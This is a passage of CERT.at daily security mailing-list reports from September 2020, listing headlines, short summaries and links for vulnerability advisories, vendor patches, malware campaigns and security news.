Security updates have been issued by CentOS (thunderbird), Debian (libproxy, qemu, and wordpress), Fedora (ansible, chromium, community-mysql, dotnet-build-reference-packages, dotnet3.1, drupal7, grub2, java-1.8.0-openjdk-aarch32, kernel, kernel-headers, kernel-tools, mingw-gnutls, php-symfony4, python-django, and selinux-policy), Gentoo (DBI, file-roller, gnome-shell, gst-rtsp-server, nextcloud-client, php, proftpd, qtgui, and zeromq), openSUSE (gimp, libjpeg-turbo, openldap2, [...]
---------------------------------------------
https://lwn.net/Articles/831524/
∗∗∗ Vulnerabilities Expose Thousands of MobileIron Servers to Remote Attacks ∗∗∗
---------------------------------------------
Researchers have disclosed the details of several potentially serious vulnerabilities affecting MobileIron’s mobile device management (MDM) solutions, including a flaw that can be exploited by an unauthenticated attacker for remote code execution on affected servers.
---------------------------------------------
https://www.securityweek.com/vulnerabilities-expose-thousands-mobileiron-se…
∗∗∗ Multiple vulnerabilities in Buffalo AirStation WHR-G54S ∗∗∗
---------------------------------------------
https://jvn.jp/en/jp/JVN09166495/
∗∗∗ Security Bulletin: IBM Cloud Pak System is affected by a vulnerability in VMware component ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-system-is-a…
∗∗∗ Security Bulletin: A vulnerability in Apache ActiveMQ affects IBM Operations Analytics Predictive Insights (CVE-2020-1941) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-apache…
∗∗∗ Security Bulletin: Vulnerability in libcurl affects the OS image for RedHat Enterprise Linux for IBM Cloud Pak System (CVE-2019-5436) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-libcurl-…
∗∗∗ Security Bulletin: Vulnerability in OpenSSL library affects OS Pattern Kit used in IBM Cloud Pak System ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-openssl-…
∗∗∗ Security Bulletin: IBM Kenexa LMS On Premise -IBM SDK, Java Technology Edition Quarterly CPU -Jul 2020 – Includes Oracle Jul 2020 CPU plus one additional vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-kenexa-lms-on-premise…
∗∗∗ Security Bulletin: IBM Kenexa LCMS Premier On Premise – [All] jQuery (Publicly disclosed vulnerability) CVEID: 180875 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-kenexa-lcms-premier-o…
∗∗∗ Security Bulletin: Vulnerability in side channel in Intel CPUs affect IBM Cloud Pak System (CVE-2019-11135) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-side-cha…
∗∗∗ Security Bulletin: IBM Kenexa LCMS Premier On Premise – [All] jQuery (Publicly disclosed vulnerability) CVE-2020-11023, CVE-2020-11022 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-kenexa-lcms-premier-o…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK addressed in IBM Cloud Pak System (April 2020 updates) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 10-09-2020 18:00 − Friday 11-09-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Zoom adds two-factor authentication (2FA) support to all accounts ∗∗∗
---------------------------------------------
Zoom has announced that starting today it has added two-factor authentication (2FA) support to all user accounts to make it simpler to secure them against security breaches and identity theft.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/zoom-adds-two-factor-authent…
∗∗∗ What's in Your Clipboard? Pillaging and Protecting the Clipboard, (Fri, Sep 11th) ∗∗∗
---------------------------------------------
Recently I happened to notice that the Cisco AnyConnect VPN client clears the clipboard if you paste a password into it. (Note - if you know and can type any of your passwords in 2020, you should at least partially examine your life choices). Several password managers also do this "right thing" - retaining passwords in the clipboard is a great way for folks to accidentally paste that information into the worst [...]
---------------------------------------------
https://isc.sans.edu/diary/rss/26556
∗∗∗ WordPress Malware Disables Security Plugins to Avoid Detection ∗∗∗
---------------------------------------------
An alarm or monitoring system is a great tool that can be used to improve the security of a home or website, but what if an attacker can easily disable it?
---------------------------------------------
https://blog.sucuri.net/2020/09/wordpress-malware-disables-security-to-avoi…
∗∗∗ Bluetooth susceptible to attacks on keys, somehow ∗∗∗
---------------------------------------------
CERT/CC and the Bluetooth standardization body warn of Blurtooth, but are stingy with information about the discovered vulnerability.
---------------------------------------------
https://heise.de/-4891764
∗∗∗ Secure passwords protect against loss and misuse ∗∗∗
---------------------------------------------
Secure passwords do not only protect private information from strangers. Above all, they protect against financial damage and identity misuse. Particular attention should therefore be paid to password security.
---------------------------------------------
https://www.watchlist-internet.at/news/sichere-passwoerter-schuetzen-vor-ve…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (python-pip), Fedora (kernel, libX11, and xen), openSUSE (go1.14), Oracle (libcroco, php:7.3, and postgresql:10), Red Hat (chromium-browser and httpd:2.4), and SUSE (gimp, golang-github-prometheus-prometheus, kernel, libxml2, pdsh, slurm_20_02, slurm, slurm_18_08, and tomcat).
---------------------------------------------
https://lwn.net/Articles/831283/
∗∗∗ Security Bulletin: Vulnerability in IBM Java Runtime affects Host On-Demand ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java…
∗∗∗ Security Bulletin: A vulnerability may affect IBM® SDK, Java™ Technology Edition used in Liberty for Java for IBM Cloud (CVE-2020-2590) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-may-affec…
∗∗∗ Security Bulletin: IBM® Db2® on AIX and Linux Affected by a Vulnerability in IBM® Spectrum Scale (CVE-2020-4411) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-on-aix-and-linux-…
∗∗∗ Security Bulletin: IBM® SDK, Java™ Technology Edition Quarterly CPU – Jul 2020 – Includes Oracle Jul 2020 CPU plus one additional vulnerability affects Liberty for Java for IBM Cloud ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-sdk-java-technology-e…
∗∗∗ Security Bulletin: IBM® Db2® on AIX and Linux Affected by a Vulnerability in IBM® Spectrum Scale (CVE-2020-4412) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-on-aix-and-linux-…
∗∗∗ Security Bulletin: A vulnerability in IBM Java SDK and IBM Java Runtime related to the Kerberos component affect IBM® Db2®. (CVE-2019-2949) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja…
∗∗∗ Security Bulletin: A vulnerability may affect IBM® SDK, Java™ Technology Edition used in Liberty for Java for IBM Cloud (CVE-2020-2601) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-may-affec…
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 09-09-2020 18:00 − Thursday 10-09-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ ProLock ransomware increases payment demand and victim count ∗∗∗
---------------------------------------------
Using standard tactics, the operators of ProLock ransomware were able to deploy a large number of attacks over the past six months, averaging close to one target every day.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/prolock-ransomware-increases…
∗∗∗ An overview of targeted attacks and APTs on Linux ∗∗∗
---------------------------------------------
Perhaps unsurprisingly, a lot has been written about targeted attacks on Windows systems. Windows is, due to its popularity, the platform for which we discover most APT attack tools. At the same time, there’s a widely held opinion that Linux [...]
---------------------------------------------
https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98…
∗∗∗ Zeppelin Ransomware Returns with New Trojan on Board ∗∗∗
---------------------------------------------
The malware has popped up in a targeted campaign and a new infection routine.
---------------------------------------------
https://threatpost.com/zeppelin-ransomware-returns-trojan/159092/
∗∗∗ O365 Phishing Attack Used Real-Time Validation against Active Directory ∗∗∗
---------------------------------------------
A phishing attack used real-time validation against an organization’s Active Directory in order to steal users’ Office 365 credentials. According to Armorblox, the phishing attack targeted an executive working at an American brand that was named one of the world’s Top 50 most innovative companies for 2019 on a Friday evening. The email used spoofing [...]
---------------------------------------------
https://www.tripwire.com/state-of-security/security-data-protection/o365-ph…
∗∗∗ BLURtooth Vulnerability Can Allow Bluetooth MITM Attacks ∗∗∗
---------------------------------------------
A security vulnerability in the Cross-Transport Key Derivation (CTKD) of devices supporting both Bluetooth BR/EDR and LE could allow an attacker to overwrite encryption keys, researchers have discovered.
---------------------------------------------
https://www.securityweek.com/blurtooth-vulnerability-can-allow-bluetooth-mi…
∗∗∗ Fake sweepstake with Cineplexx voucher lures into subscription trap ∗∗∗
---------------------------------------------
A sweepstake is being advertised on Facebook via ads and Facebook Messenger. You have allegedly been selected to receive vouchers for Cineplexx cinemas. For this you are supposed to pay 2 euros in shipping costs with your credit card. Caution: the sweepstake is fake, the vouchers do not exist, and you end up in a subscription trap! Cineplexx itself has nothing to do with these sweepstakes.
---------------------------------------------
https://www.watchlist-internet.at/news/fake-gewinnspiel-mit-cineplexx-gutsc…
∗∗∗ New CDRThief malware targets VoIP softswitches to steal call detail records ∗∗∗
---------------------------------------------
Malware targets only two very specific softswitches (software switches): Linknat VOS2009 and VOS3000.
---------------------------------------------
https://www.zdnet.com/article/new-cdrthief-malware-targets-voip-softswitche…
∗∗∗ Ransomware attacks multiplied ∗∗∗
---------------------------------------------
The number of ransomware attacks rose by 715% in the first half of the year compared to the previous year. The ransom extortionists are becoming ever more dangerous and are causing heavy damage.
---------------------------------------------
https://www.zdnet.de/88382645/ransomware-attacken-vervielfacht/
∗∗∗ Recent Dridex activity, (Thu, Sep 10th) ∗∗∗
---------------------------------------------
For the past month or so, I hadn't had any luck finding active malspam campaigns pushing Dridex malware. That changed starting this week, and I've since found several examples. Today's diary reviews an infection from Wednesday September 9th, 2020.
---------------------------------------------
https://isc.sans.edu/diary/rss/26550
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (ark, gnupg, go, opendmarc, and python-django), Debian (libxml2), Gentoo (chromium), Oracle (librepo and thunderbird), Red Hat (dovecot and httpd:2.4), SUSE (avahi, kernel, and openldap2), and Ubuntu (xorg-server).
---------------------------------------------
https://lwn.net/Articles/831178/
∗∗∗ Palo Alto Networks Patches Serious DoS, Code Execution Flaws in PAN-OS ∗∗∗
---------------------------------------------
Palo Alto Networks this week announced that it has patched critical and high-severity denial-of-service (DoS) and arbitrary code execution vulnerabilities in its PAN-OS firewall software.
---------------------------------------------
https://www.securityweek.com/palo-alto-networks-patches-serious-dos-code-ex…
∗∗∗ PEPPERL+FUCHS/VMT Bildverarbeitungssysteme GmbH: VMT MSS and VMT IS - Several vulnerabilities in products utilizing WIBU SYSTEMS CodeMeter components ∗∗∗
---------------------------------------------
https://cert.vde.com/de-de/advisories/vde-2020-034
∗∗∗ PILZ: Multiple products prone to WIBU CodeMeter vulnerabilities ∗∗∗
---------------------------------------------
https://cert.vde.com/de-de/advisories/vde-2020-033
∗∗∗ avahi: Vulnerability allows bypassing of security measures ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0892
∗∗∗ Ruby on Rails: Vulnerability allows cross-site scripting ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0891
∗∗∗ Security Advisory - Information Leak Vulnerability in Huawei Smartphone ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200909-…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Vulnerability in jackson-databind shipped with IBM Cloud Pak System ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-jackson-…
∗∗∗ Security Bulletin: WebSphere Application Server Admin Console is vulnerable to cross-site scripting (CVE-2020-4578) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-websphere-application-ser…
∗∗∗ Security Bulletin: Vulnerabilities in IBM HTTP Server affects IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-ht…
∗∗∗ Security Bulletin: Multiple vulnerabilities in Apache HTTP Server affect IBM i ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Vulnerability in IBM Java SDK affects IBM Cloud Orchestrator (CVE-2020-2654) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 08-09-2020 18:00 − Wednesday 09-09-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Hackers use legit tool to take over Docker, Kubernetes platforms ∗∗∗
---------------------------------------------
In a recent attack, cybercrime group TeamTNT relied on a legitimate tool to avoid deploying malicious code on compromised cloud infrastructure and still have a good grip on it.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-use-legit-tool-to-ta…
∗∗∗ Diffie-Hellman side channel: Raccoon attack on TLS affects only a few ∗∗∗
---------------------------------------------
Researchers demonstrate a previously unknown weakness in the TLS protocol, but the practical risks are very low.
---------------------------------------------
https://www.golem.de/news/diffie-hellman-seitenkanal-raccoon-angriff-auf-tl…
∗∗∗ Attacking the Qualcomm Adreno GPU ∗∗∗
---------------------------------------------
When writing an Android exploit, breaking out of the application sandbox is often a key step. There are a wide range of remote attacks that give you code execution with the privileges of an application (like the browser or a messaging application), but a sandbox escape is still required to gain full system access. This blog post focuses on an interesting attack surface that is accessible from the Android application sandbox: the graphics processing unit (GPU)
---------------------------------------------
https://googleprojectzero.blogspot.com/2020/09/attacking-qualcomm-adreno-gp…
∗∗∗ Adobe fixes vulnerabilities ∗∗∗
---------------------------------------------
Adobe's latest round of security updates fixes serious flaws in Experience Manager, InDesign and Framemaker. The graphics specialist is also saying goodbye to Flash.
---------------------------------------------
https://www.zdnet.de/88382613/adobe-behebt-schwachstellen/
=====================
= Vulnerabilities =
=====================
∗∗∗ Patch day: Attacker-crafted websites could become dangerous for Windows ∗∗∗
---------------------------------------------
Microsoft has released security updates for several products and closed over 120 security holes.
---------------------------------------------
https://heise.de/-4888876
∗∗∗ IPAS: Security Advisories for September 2020 ∗∗∗
---------------------------------------------
Hi everyone, Today we are releasing four security advisories addressing 9 vulnerabilities that were all internally found by Intel except for INTEL-SA-00405 which was reported through our bug bounty program.
---------------------------------------------
https://blogs.intel.com/technology/2020/09/intel-september-2020-security-ad…
∗∗∗ Google Android: Multiple vulnerabilities ∗∗∗
---------------------------------------------
A remote, anonymous attacker can exploit multiple vulnerabilities in Google Android to execute malicious code, escalate privileges, spy on information and bypass security mechanisms. Ultimately, the attacker can take control of the device. Installing or using a malicious app is sufficient for exploitation.
---------------------------------------------
https://www.bsi-fuer-buerger.de/SharedDocs/Warnmeldungen/DE/TW/2020/09/warn…
∗∗∗ Reflected XSS in WordPress Plugin Admin Pages ∗∗∗
---------------------------------------------
The administrative dashboard in WordPress is a pretty safe place: Only elevated users can access it. Exploiting a plugin’s admin panel would serve very little purpose here — an administrator already has the required permissions to do all of the actions a vulnerability could cause. While this is usually true, there are a number of techniques bad actors are using to trick an administrator into performing actions they would not expect, such as Cross Site Request Forgery (CSRF) or [...]
---------------------------------------------
https://blog.sucuri.net/2020/09/reflected-xss-in-wordpress-plugin-admin-pag…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (grunt), Fedora (ansible and geary), openSUSE (firefox, gettext-runtime, python-Flask-Cors, and thunderbird), Oracle (firefox and thunderbird), Red Hat (.NET Core 3.1), SUSE (kernel and libjpeg-turbo), and Ubuntu (gnutls28 and libx11).
---------------------------------------------
https://lwn.net/Articles/831069/
∗∗∗ PHOENIX CONTACT: Products utilizing WIBU SYSTEMS CodeMeter components ∗∗∗
---------------------------------------------
Several vulnerabilities have been discovered in WIBU SYSTEMS CodeMeter Runtime.
---------------------------------------------
https://cert.vde.com/de-de/advisories/copy_of_vde-2020-030
∗∗∗ WAGO: Vulnerable WIBU-SYSTEMS Codemeter installed through e!COCKPIT ∗∗∗
---------------------------------------------
Multiple vulnerabilities were reported in WIBU-SYSTEMS Codemeter.
---------------------------------------------
https://cert.vde.com/de-de/advisories/vde-2020-032
∗∗∗ Security Advisory - Privilege Elevation Vulnerability in Microsoft Windows Kerberos Key Distribution Center ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20200909-…
∗∗∗ Security Advisory - Buffer Overflow Vulnerability on Several Mobile Broadband Products ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200909-…
∗∗∗ Security Advisory - MITM Vulnerability on Huawei Share ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200909-…
∗∗∗ Security Bulletin: IBM InfoSphere Metadata Asset Manager is vulnerable to stored cross-site scripting and server-side request forgery. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-infosphere-metadata-a…
∗∗∗ Security Bulletin: Multiple Security Vulnerabilities Affect IBM WebSphere Application Server in IBM Cloud ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera…
∗∗∗ Security Bulletin: Improper DLL loading vulnerability affecting Aspera Connect 3.9.9 and earlier ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-improper-dll-loading-vuln…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 07-09-2020 18:00 − Tuesday 08-09-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Windows 10 themes can be abused to steal Windows accounts ∗∗∗
---------------------------------------------
Specially crafted Windows 10 themes and theme packs can be used in Pass-the-Hash attacks to steal Windows account credentials from unsuspecting users.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/windows-10-themes-can-be-ab…
∗∗∗ Office: About OLE and ZIP Files, (Mon, Sep 7th) ∗∗∗
---------------------------------------------
A reader asked if a particular Emotet sample was a malformed ZIP file. It is not, and I will explain why you might think it is in this diary entry.
---------------------------------------------
https://isc.sans.edu/diary/rss/26540
∗∗∗ Japan, France, New Zealand Warn of Sudden Uptick in Emotet Trojan Attacks ∗∗∗
---------------------------------------------
Cybersecurity agencies across Asia and Europe have issued multiple security alerts regarding the resurgence of email-based Emotet malware attacks targeting businesses in France, Japan, and New Zealand.
---------------------------------------------
https://thehackernews.com/2020/09/emotet-malware-attack.html
∗∗∗ What are tech support scams? And: how to protect yourself! ∗∗∗
---------------------------------------------
A tech support scam is a fraud scheme in which criminals pose as service staff of Microsoft or Apple and fake a computer problem. Contact is made either by the criminals by telephone, or the victims themselves call a supposed service centre because of a pop-up. In both cases, remote maintenance software is installed in order to spy out login credentials, install malware, delete data or [...]
---------------------------------------------
https://www.watchlist-internet.at/news/was-sind-tech-support-scams-und-wie-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security Bulletins Posted ∗∗∗
---------------------------------------------
Adobe has published security bulletins for Adobe InDesign (APSB20-52), Adobe Framemaker (APSB20-54) and Adobe Experience Manager (APSB20-56). Adobe recommends users update their product installations to the latest versions using the instructions referenced in the bulletin.
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1916
∗∗∗ Windows 10 Sandbox activation enables zero-day vulnerability ∗∗∗
---------------------------------------------
A reverse engineer discovered a new zero-day vulnerability in most Windows 10 editions that allows creating files in restricted areas of the operating system.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/windows-10-sandbox-activatio…
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (imagemagick, lemonldap-ng, and zeromq3), Fedora (ark, cryptsetup, gnutls, kernel, kernel-headers, and kernel-tools), openSUSE (firefox, kernel, and thunderbird), Red Hat (cloud-init, go-toolset:rhel8, libcroco, librepo, php:7.3, postgresql:10, and thunderbird), SUSE (firefox and go1.14), and Ubuntu (linux, linux-aws, linux-aws-5.3, linux-aws-5.4, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-azure-5.4, linux-gcp, linux-gcp-4.15, linux-gcp-5.4, [...]
---------------------------------------------
https://lwn.net/Articles/830941/
∗∗∗ SAP Patch Day September 2020 ∗∗∗
---------------------------------------------
A remote, authenticated or anonymous attacker can exploit multiple vulnerabilities in SAP products and application components to compromise the confidentiality, availability and integrity of the applications.
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0870
∗∗∗ Citrix StoreFront Security Update ∗∗∗
---------------------------------------------
An issue has been discovered in Citrix StoreFront that, if exploited, would allow an attacker who is authenticated on the same Microsoft Active Directory domain as a Citrix StoreFront server to read arbitrary files from that server.
---------------------------------------------
https://support.citrix.com/article/CTX277455
∗∗∗ SSA-770698: User Information Disclosure Vulnerability in Siveillance Video Client ∗∗∗
---------------------------------------------
The Siveillance Video Client contains an information disclosure vulnerability that could allow an attacker to obtain valid administrator login names and use this information to launch further attacks.
---------------------------------------------
https://cert-portal.siemens.com/productcert/txt/ssa-770698.txt
∗∗∗ SSA-709003: Privilege Escalation Vulnerability in License Management Utility (LMU) ∗∗∗
---------------------------------------------
The latest update for the License Management Utility (LMU), which is used by multiple Siemens building technology products, fixes a vulnerability that could allow local users to escalate privileges and execute code as local SYSTEM user.
---------------------------------------------
https://cert-portal.siemens.com/productcert/txt/ssa-709003.txt
∗∗∗ SSA-568969: Insecure Storage of Sensitive Information in Spectrum Power™ 4 ∗∗∗
---------------------------------------------
Vulnerabilities in Spectrum Power™ 4 could allow an unauthorized attacker to retrieve a list of software users, or in certain cases to list the contents of a directory.
---------------------------------------------
https://cert-portal.siemens.com/productcert/txt/ssa-568969.txt
∗∗∗ SSA-542525: Authentication Vulnerabilities in SIMATIC HMI Products ∗∗∗
---------------------------------------------
SIMATIC HMI Products are affected by two vulnerabilities that could allow a remote attacker to discover user passwords and obtain access to the Sm@rt Server via a brute-force attack.
---------------------------------------------
https://cert-portal.siemens.com/productcert/txt/ssa-542525.txt
∗∗∗ SSA-534763: Special Register Buffer Data Sampling (SRBDS) aka Crosstalk in Industrial Products ∗∗∗
---------------------------------------------
Security researchers published information on a vulnerability known as Crosstalk (INTEL-SA-00320). This vulnerability affects modern Intel processors to a varying degree.
---------------------------------------------
https://cert-portal.siemens.com/productcert/txt/ssa-534763.txt
∗∗∗ SSA-455843: WIBU Systems CodeMeter Runtime Vulnerabilities in Siemens and Siemens Energy Products ∗∗∗
---------------------------------------------
CISA and WIBU Systems disclosed six vulnerabilities in different versions of CodeMeter Runtime, a product provided by WIBU Systems and used in several Siemens and Siemens Energy products for license management.
---------------------------------------------
https://cert-portal.siemens.com/productcert/txt/ssa-455843.txt
∗∗∗ SSA-436520: XSS and CSRF Vulnerabilities in Polarion Subversion Webclient ∗∗∗
---------------------------------------------
Multiple cross-site scripting (XSS) vulnerabilities were found in the Subversion web client of Polarion. In addition, the web client doesn't have any cross-site request forgery (CSRF) protection. An attacker could inject client-side script to induce the victim to issue an HTTP request that would lead to a state-changing operation.
---------------------------------------------
https://cert-portal.siemens.com/productcert/txt/ssa-436520.txt
∗∗∗ SSA-381684: Improper Password Protection during Authentication in SIMATIC S7-300 and S7-400 CPUs ∗∗∗
---------------------------------------------
A vulnerability has been identified in SIMATIC S7-300 and S7-400 CPU families, which could result in credential disclosure.
---------------------------------------------
https://cert-portal.siemens.com/productcert/txt/ssa-381684.txt
∗∗∗ SSA-251935: Multiple Privilege Escalation Vulnerabilities in SIMATIC RTLS Locating Manager ∗∗∗
---------------------------------------------
The latest update for SIMATIC RTLS Locating Manager fixes various vulnerabilities that could allow a low-privileged local user to escalate privileges.
---------------------------------------------
https://cert-portal.siemens.com/productcert/txt/ssa-251935.txt
∗∗∗ Red Hat Enterprise Linux: Multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0871
∗∗∗ Security Bulletin: Novalink is impacted by denial of service high vulnerability in WebSphere Application Server Liberty CVE-2019-4720 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-novalink-is-impacted-by-d…
∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ Security Bulletin: IBM SDK, Java Technology Edition Quarterly CPU – July 2020 – Includes Oracle July 2020 CPU affects IBM Tivoli Composite Application Manager for Transactions-Robotic Response Time ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-sdk-java-technology-e…
∗∗∗ Security Bulletin: Vulnerability in IBM Java Runtime affecting Tivoli Netcool/OMNIbus (CVE-2020-2654) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java…
∗∗∗ Security Bulletin: Novalink is impacted by publicly disclosed vulnerability in IBM Java SDK/JRE (CVE-2019-4732) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-bulletin-novalin…
∗∗∗ Security Bulletin: Novalink is impacted Apache CXF affects middle vulnerability in WebSphere Application Server Liberty (CVE-2019-12406) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-novalink-is-impacted-apac…
∗∗∗ Security Bulletin: Novalink is impacted by Apache CXF affects WebSphere Liberty JAX-WS middle vulnerability in WebSphere Application Server Liberty (CVE-2019-17573) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-novalink-is-impacted-by-a…
∗∗∗ Security Bulletin: Vulnerability in Apache Ant affects IBM Platform Symphony and IBM Spectrum Symphony ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-a…
=====================
= End-of-Day report =
=====================
Timeframe: Friday 04-09-2020 18:00 − Monday 07-09-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Visa warns of new Baka credit card JavaScript skimmer ∗∗∗
---------------------------------------------
Visa issued a warning regarding a new JavaScript e-commerce skimmer known as Baka that will remove itself from memory after exfiltrating stolen data and analysis.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/visa-warns-of-new-baka-credi…
∗∗∗ Threema E2EE chat app to go fully open source within months ∗∗∗
---------------------------------------------
Threema follows in the footsteps of Signal and Wickr and opens its apps codebase.
---------------------------------------------
https://www.zdnet.com/article/threema-e2ee-chat-app-to-go-fully-open-source…
∗∗∗ Manipulated Excel files in phishing emails ∗∗∗
---------------------------------------------
A newly discovered malware gang is using a clever trick to create malicious Excel files that have a higher chance of bypassing security systems.
---------------------------------------------
https://www.zdnet.de/88382491/manipulierte-excel-dateien-in-phishing-mails/
∗∗∗ Attacks on WordPress plugin ∗∗∗
---------------------------------------------
Millions of WordPress sites were attacked this week because hackers are exploiting a zero-day vulnerability in "File Manager", a popular WordPress plugin.
---------------------------------------------
https://www.zdnet.de/88382493/angriffe-auf-wordpress-plug-in/
=====================
= Vulnerabilities =
=====================
∗∗∗ Linux: No hurry in closing a kernel security hole ∗∗∗
---------------------------------------------
A buffer overflow in the Linux kernel lets local users crash a system; privilege escalation is probably possible as well.
---------------------------------------------
https://www.golem.de/news/linux-keine-eile-beim-schliessen-einer-kernel-sic…
∗∗∗ Insufficient Privilege Validation in NextScripts: Social Networks Auto-Poster ∗∗∗
---------------------------------------------
During a routine research audit for our Sucuri Firewall, we discovered post deletion, arbitrary posting to social networks, and arbitrary plugin settings update vulnerabilities affecting over 100,000 users of the WordPress plugin.
---------------------------------------------
https://blog.sucuri.net/2020/09/insufficient-privilege-validation-in-nextsc…
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (ark, netty, netty-3.9, qemu, squid3, and xorg-server), Fedora (chromium), Gentoo (dovecot and gnutls), Mageia (ansible, postgresql, and python-rsa), openSUSE (curl, freerdp, libX11, php7, squid, and xorg-x11-server), Oracle (kernel), Red Hat (thunderbird), Slackware (gnutls), and SUSE (firefox, kernel, and thunderbird).
---------------------------------------------
https://lwn.net/Articles/830856/
∗∗∗ Security Bulletin: Cross-site scripting vulnerability affects IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-4698 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln…
∗∗∗ Security Bulletin: Vulnerability in IBM Java SDK affects IMS™ Enterprise Suite: Explorer for Development (CVE-2020-14577) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java…
∗∗∗ Security Bulletin: Vulnerabilities in IBM Java Runtime affecting Tivoli Netcool/OMNIbus (Multiple CVEs) ∗∗∗
---------------------------------------------
